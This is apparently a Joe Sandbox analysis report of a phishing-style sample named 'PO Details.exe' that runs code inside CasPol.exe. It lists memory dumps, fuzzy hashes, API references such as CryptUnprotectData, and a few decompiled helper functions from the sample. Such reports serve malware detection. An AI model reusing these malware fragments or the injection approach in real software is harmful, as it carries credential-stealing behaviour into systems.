Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 631b6d606f958dd3b9f901d17eba749f6bbdc97bd5f3e27fdad90cb16f3fbd8e
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 1CE0EC3261212097C7219F55BE08B6E7768AF48B22F06146AE9C5BB2608B745D424FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405D32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405D32(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405d33
0x00405d3d
0x00405d40
0x00405d46
0x00405d47
0x00405d48
0x00405d50
0x00000000
0x00000000
0x00000000
0x00405d50
0x00405d52
0x00405d5a

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Details.exe,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D38
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Details.exe,C:\Users\user\Desktop\PO Details.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D48

Strings

C:\Users\user\Desktop, xrefs: 00405D32

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction ID: cdcea1fdb6b733c318131938d2018cbcd3f5257763d90021158e822df2c29c6c
Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction Fuzzy Hash: FCD05EB24009209AC3126704DC0999F67A8FF5130078A842BF541AA1A4D7785C818AAC

Uniqueness

Uniqueness Score: -1.00%

Function 6E4910E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E4910E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x6e49506c = _a8;
				 *0x6e495070 = _a16;
				 *0x6e495074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6e495048, E6E4915B1, _t51, _t56);
				_t41 =  *0x6e49506c +  *0x6e49506c * 4 << 3;
				_t17 = E6E491243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E6E491272(E6E4912BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E6E4912E1(( *_t54 & 0x0000ffff) - 0x30, E6E491243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x6e495040;
								 *0x6e495040 = _t30;
								E6E491563(_t30 + 4,  *0x6e495074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x6e495040;
							if( *0x6e495040 != 0) {
								E6E491563( *0x6e495074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x6e495040;
								GlobalFree(_t36);
								 *0x6e495040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x6e4910e6
0x6e4910f0
0x6e4910ff
0x6e49110e
0x6e491119
0x6e49111c
0x6e49112b
0x6e49112f
0x6e491131
0x6e4911d8
0x6e4911de
0x6e491137
0x6e491138
0x6e491138
0x6e49113d
0x6e49113e
0x6e491140
0x6e491143
0x6e49120d
0x6e491210
0x6e4911b0
0x6e4911b6
0x6e4911bf
0x6e4911c4
0x6e4911c7
0x00000000
0x6e4911c7
0x6e491212
0x6e491214
0x6e491196
0x6e49119d
0x6e4911a5
0x00000000
0x6e4911a5
0x6e491161
0x6e491162
0x6e49116a
0x6e491177
0x6e49117f
0x6e491188
0x6e49118d
0x6e49118d
0x00000000
0x6e491162
0x6e491149
0x6e4911df
0x6e4911df
0x6e4911e6
0x6e4911f3
0x6e4911f8
0x6e4911fb
0x6e491203
0x6e491205
0x6e491205
0x00000000
0x6e4911e6
0x6e49114f
0x6e491152
0x00000000
0x00000000
0x6e491158
0x6e49115b
0x6e4911ac
0x00000000
0x6e4911ac
0x6e49115d
0x6e49115f
0x6e491192
0x00000000
0x6e491192
0x00000000
0x6e4911c9
0x6e4911c9
0x6e4911d3
0x00000000
0x6e4911d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6E49116A
GlobalFree.KERNEL32(00000000), ref: 6E4911C7
GlobalFree.KERNEL32(00000000), ref: 6E4911D9
GlobalFree.KERNEL32(?), ref: 6E491203

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: bc9a1b9998868b2703b110d86965abc853d274799e351610ffc1be5c2a8da84f
Instruction ID: 6f0237855dc62f0537d992c745fac28f8460a508d223675f5607482c37e9ef94
Opcode Fuzzy Hash: bc9a1b9998868b2703b110d86965abc853d274799e351610ffc1be5c2a8da84f
Instruction Fuzzy Hash: 453170B1500206AFDB00AFF9E856D697FECFB5A251B12051BE844F6354E778EC09D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E6C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405e7c
0x00405e7e
0x00405e81
0x00405ead
0x00405e86
0x00405e8f
0x00405e94
0x00405e9f
0x00405ea2
0x00405ebe
0x00405ea4
0x00405eab
0x00000000
0x00405eab
0x00405eb7
0x00405ebb
0x00405ebb
0x00405eb5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 7460, Parent PID: 6368COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	99.8%
Signature Coverage:	0.3%
Total number of Nodes:	889
Total number of Limit Nodes:	19

Executed Functions

Function 00A43D88 Relevance: 13.5, Strings: 10, Instructions: 1001COMMON

Download Yara Rule

Strings

(ok, xrefs: 00A43F3A
,k, xrefs: 00A44228
(ok, xrefs: 00A44297
(ok, xrefs: 00A43E71
(ok, xrefs: 00A43DB6
(ok, xrefs: 00A43E9D
(ok, xrefs: 00A44287
(ok, xrefs: 00A44349
4'k, xrefs: 00A4498B
,k, xrefs: 00A44218

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$(ok$(ok$(ok$(ok$(ok$(ok$,k$,k$4'k
API String ID: 0-4277201493
Opcode ID: 3369efbaf189ea5dce5a23423c65abd7e06133d9ebda4c86559225366480e1e7
Instruction ID: 6cc64dbd44208284e13d16ba62a113c0c8a0b7af92a2d07105f22190fb5c4bf3
Opcode Fuzzy Hash: 3369efbaf189ea5dce5a23423c65abd7e06133d9ebda4c86559225366480e1e7
Instruction Fuzzy Hash: A6924A39A00259DFCB14CF68C984BAEBBF2BF88314F258559E415EB2A1D771ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A43038 Relevance: 8.4, Strings: 6, Instructions: 898COMMON

Download Yara Rule

Strings

(ok, xrefs: 00A438A8
Hk, xrefs: 00A4342E
(ok, xrefs: 00A43562
,k, xrefs: 00A43912
(ok, xrefs: 00A4389A
,k, xrefs: 00A43920

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$(ok$(ok$,k$,k$Hk
API String ID: 0-3241389771
Opcode ID: 92533d94a4ad905bfbc58045b0900b948cdb8415ef9e7afb9d098ce012e4017f
Instruction ID: a983afb3580095ec3e1be541c2b402bf26e40381a5fb8b3fc299769ab72371b4
Opcode Fuzzy Hash: 92533d94a4ad905bfbc58045b0900b948cdb8415ef9e7afb9d098ce012e4017f
Instruction Fuzzy Hash: 2C729D76A002199FDF14CF68C894AAEBBB2FFC8344F258069E4159B3A1DB31DD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 2030B5C0 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 2030B62D

Memory Dump Source

Source File: 0000000B.00000002.14030301449.0000000020300000.00000040.00000800.00020000.00000000.sdmp, Offset: 20300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_20300000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 5b8852c787c15e1dacee373a5f088bbffebdd61f6978d61442a362d6393d8932
Instruction ID: 56e4e7d4544f33bc68726c9a4a94c3fbd32baa864d38f0d8aeb011e8fd54e372
Opcode Fuzzy Hash: 5b8852c787c15e1dacee373a5f088bbffebdd61f6978d61442a362d6393d8932
Instruction Fuzzy Hash: D41156B68002499FCB10CF99D844BEEBFF4EF48320F108429E558A7610D379AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 2030B024 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 2030B62D

Memory Dump Source

Source File: 0000000B.00000002.14030301449.0000000020300000.00000040.00000800.00020000.00000000.sdmp, Offset: 20300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_20300000_CasPol.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: bd535083ec2434d2b5fb44bb22caeab861b200e4fe044df845771b065087306e
Instruction ID: eba5766fd93b89b5f9ea863f0eac6dfebbf91b4f27808d6e98f14ac12ae53533
Opcode Fuzzy Hash: bd535083ec2434d2b5fb44bb22caeab861b200e4fe044df845771b065087306e
Instruction Fuzzy Hash: B9115672800249DFCB10CF99C844BEEBBF5EF48320F148419EA58A7211D379AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A40040 Relevance: 1.4, Instructions: 1380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4466ffe8680ace6506e9efccd2a6a05d776b822b870b3fed39f2e523c9c26d
Instruction ID: efd1ce6351753e68f8e2da1075d6cd23a41c17f9a0ce3c7bbe27dd11024b0cbb
Opcode Fuzzy Hash: 3c4466ffe8680ace6506e9efccd2a6a05d776b822b870b3fed39f2e523c9c26d
Instruction Fuzzy Hash: 72A29674B0D3818FD7068774C865BAA7BB29BD6304F1A84B6E648DF396DA34DC09C711

Uniqueness

Uniqueness Score: -1.00%

Function 00A4F3E8 Relevance: 1.2, Instructions: 1175COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020d82e05b47effc4083012e661c765a6709207fd61c890d71d34538fd9abcda
Instruction ID: d163b09f1e601b5754143d03568140cff177aa304c38667f2b540b758e5698ef
Opcode Fuzzy Hash: 020d82e05b47effc4083012e661c765a6709207fd61c890d71d34538fd9abcda
Instruction Fuzzy Hash: A382AE34B042088FDB149BB4C8946AE7BB2EFC6304F25947AD459DB396DB34DC4AC762

Uniqueness

Uniqueness Score: -1.00%

Function 1D110C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2eb1fc5279350a2b9637a60bb93d200b35e6ca840da325a306b26b4e00703b
Instruction ID: 31226f1000d96851c3c0efaa87883b1b9db521df20b53a5c9a8dd292be489e7e
Opcode Fuzzy Hash: dd2eb1fc5279350a2b9637a60bb93d200b35e6ca840da325a306b26b4e00703b
Instruction Fuzzy Hash: F5D0177504A6908FDB022730E95DAEA3F74EB9229B30509E2D055CA0A2DA300948C732

Uniqueness

Uniqueness Score: -1.00%

Function 20301A10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20301ACF

Strings

LRk, xrefs: 20301B6A
LRk, xrefs: 20301B06

Memory Dump Source

Source File: 0000000B.00000002.14030301449.0000000020300000.00000040.00000800.00020000.00000000.sdmp, Offset: 20300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_20300000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRk$LRk
API String ID: 2994545307-3442965990
Opcode ID: f184ef691db82294204a04e086981d5ae30931473689623ed10e70937ce16b37
Instruction ID: 777fc67a23a2e3a1ea8723a9de0bbb3520dd2e862d8e9da2ef916d2ce67b0889
Opcode Fuzzy Hash: f184ef691db82294204a04e086981d5ae30931473689623ed10e70937ce16b37
Instruction Fuzzy Hash: 4D51E275B052049FCB04EBB4C898AEE77B6AF89204F14856AD506DB395EF30E809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20301A70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20301ACF

Strings

LRk, xrefs: 20301B6A
LRk, xrefs: 20301B06

Memory Dump Source

Source File: 0000000B.00000002.14030301449.0000000020300000.00000040.00000800.00020000.00000000.sdmp, Offset: 20300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_20300000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRk$LRk
API String ID: 2994545307-3442965990
Opcode ID: 5ac8c17f8d833159158bce96b2f6079c4114ec5c905221302723591890db68cf
Instruction ID: 3b19168610bf38548fa9ad5c6cc3b9c44126edc959e4260b0affe7793ce492be
Opcode Fuzzy Hash: 5ac8c17f8d833159158bce96b2f6079c4114ec5c905221302723591890db68cf
Instruction Fuzzy Hash: AC519875B002099BCB04EBB4C499FDEB7B6FF89204B158529D5169B351EF74E808CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A43D78 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

(ok, xrefs: 00A43F3A
(ok, xrefs: 00A43E71
(ok, xrefs: 00A43DB6
(ok, xrefs: 00A43E9D

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$(ok$(ok$(ok
API String ID: 0-3895995617
Opcode ID: 5982616f1d186d3e431e620a5fb11a939dbaf29757fdc81efff0d60b00f3a434
Instruction ID: eb35835d2a639c1f8e3181d78fc20adea26b509e0b2f0675af950c04212e169a
Opcode Fuzzy Hash: 5982616f1d186d3e431e620a5fb11a939dbaf29757fdc81efff0d60b00f3a434
Instruction Fuzzy Hash: 1BC15935A002489FCF14CFA9C984A9EBBF2BF98314F158559E819EB261D731ED41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CEB8 Relevance: 4.8, Strings: 3, Instructions: 1092COMMON

Download Yara Rule

Strings

0o/j, xrefs: 00A4DB69
Dq/j, xrefs: 00A4DB75
PHk, xrefs: 00A4DD32

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: 0o/j$Dq/j$PHk
API String ID: 0-1223551813
Opcode ID: 411d08be7e91ae2bd3d9e7a833be4e81746782938f129a3d9305e8d0a6056dc9
Instruction ID: 88ec900a9ef26faddcb91b0b14e081c3e153e6f014e4709bec88d0f20326d149
Opcode Fuzzy Hash: 411d08be7e91ae2bd3d9e7a833be4e81746782938f129a3d9305e8d0a6056dc9
Instruction Fuzzy Hash: 68A22838A002148FCB68DF68C588A9DB7B2FF89319F5585A9E40ADB361DB36DC45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A45258 Relevance: 4.6, Strings: 3, Instructions: 829
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ok, xrefs: 00A45F59
$k, xrefs: 00A45D7C
$k, xrefs: 00A45D9F

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$$k$$k
API String ID: 0-2203033100
Opcode ID: c2165b612f802c8f33695a211ed0fbb2184dbc64ac7602fd6a4ceebd01ba2166
Instruction ID: c755b8d3814bf92dba3dff0da864ff9bb5cde22c7f33500fdfb370d2743c4c1f
Opcode Fuzzy Hash: c2165b612f802c8f33695a211ed0fbb2184dbc64ac7602fd6a4ceebd01ba2166
Instruction Fuzzy Hash: 39726035A052188FEB14DBA0C954BDE7BB2EF88304F51C1A9E14AAB794CF309D46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A42B10 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,k, xrefs: 00A42C00
,k, xrefs: 00A42BF6

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: ,k$,k
API String ID: 0-2928433764
Opcode ID: e878c955c2fe66d6e4ea4e0b22123866cbd3c09f8ab0e3a709dd19ded96a7fc6
Instruction ID: de44d72d05a95b76a989c43445e0b21d81fa3b4b30e7bc69b35fe0c4c65b25ef
Opcode Fuzzy Hash: e878c955c2fe66d6e4ea4e0b22123866cbd3c09f8ab0e3a709dd19ded96a7fc6
Instruction Fuzzy Hash: 46818F38A005058FDB14CF69C894BAEB7B2FFC9315BA68169E415DB361D731EC42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A42712 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hk, xrefs: 00A42836
Hk, xrefs: 00A42803

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: Hk$Hk
API String ID: 0-4206920932
Opcode ID: d2c6e0923d5cef104d934f4e9c34a7f5199159a7a1e4d2e7d1091005b8e1794e
Instruction ID: 14c0e5c6a4711dae4795c215d9c2454650e9113e9309b73424c2812077d865ee
Opcode Fuzzy Hash: d2c6e0923d5cef104d934f4e9c34a7f5199159a7a1e4d2e7d1091005b8e1794e
Instruction Fuzzy Hash: FE51EC393082159FDB158F64C898BAE7BB2FFC8344F558429F8528B280DB748C05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D11ED80 Relevance: 1.8, APIs: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ae281c093c2645c15b1f2c1f6bbd77358dad4300a626d355d35a14460d201ed6
Instruction ID: f6941aeb5eef5ddcfd3260729bcf4a3d83af9e1806f7f9b65813f3df46d9cc8b
Opcode Fuzzy Hash: ae281c093c2645c15b1f2c1f6bbd77358dad4300a626d355d35a14460d201ed6
Instruction Fuzzy Hash: 3E02B675941339CFCB69EF30C98868AB772BF49715F1141EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EDA1 Relevance: 1.8, APIs: 1, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d110000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 26bc6825fbaa4d106b7f1113b4c4a545831b76a3bbc86922324d2dfe12aa2dfb
Instruction ID: 1e08c1d533fa160fa1f1ee30eec8cf866d6ea48b33f0c524ca006272e582cafb
Opcode Fuzzy Hash: 26bc6825fbaa4d106b7f1113b4c4a545831b76a3bbc86922324d2dfe12aa2dfb
Instruction Fuzzy Hash: 5402C675941339CFCB69EF70C988689B772BF49715F1181EAD80A66358CB329E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D11EDE6 Relevance: 1.8, APIs: 1, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D11F065

Memory Dump Source

Source File: 0000000B.00000002.14014128524.000000001D110000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D110000, based on PE: false

Joe Sandbox IDA Plugin

